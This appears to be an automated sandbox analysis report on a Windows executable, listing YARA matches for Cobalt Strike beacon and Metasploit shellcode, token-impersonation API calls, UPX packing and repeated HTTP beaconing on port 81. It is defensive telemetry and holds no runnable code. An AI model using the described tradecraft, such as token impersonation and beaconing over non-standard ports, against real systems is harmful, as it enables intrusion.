Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006AFE7C LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_006AFE7C

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006B6CB0 TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_006B6CB0

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: THsSNYblMw.exe

ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_0040DF90 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,ExitProcess,

0_2_0040DF90

Source: THsSNYblMw.exe

Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_00404154 push rbx; retf	0_2_00404155
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006D716C push 0000006Ah; retf	0_2_006D7184
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_001B0128 push eax; ret	0_2_001B0364
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_001B0192 push eax; ret	0_2_001B0364
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_001B0287 push eax; ret	0_2_001B0364
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_03538B56 push ebp; iretd	0_2_03538B57
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_03538B76 push ebp; iretd	0_2_03538B77
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_03519B65 push cs; retf	0_2_03519B66
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_03538B9F push ebp; iretd	0_2_03538BA0
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_0351B19F push ebp; iretd	0_2_0351B1A0
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_035197A4 push edi; iretd	0_2_035197A5

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 81
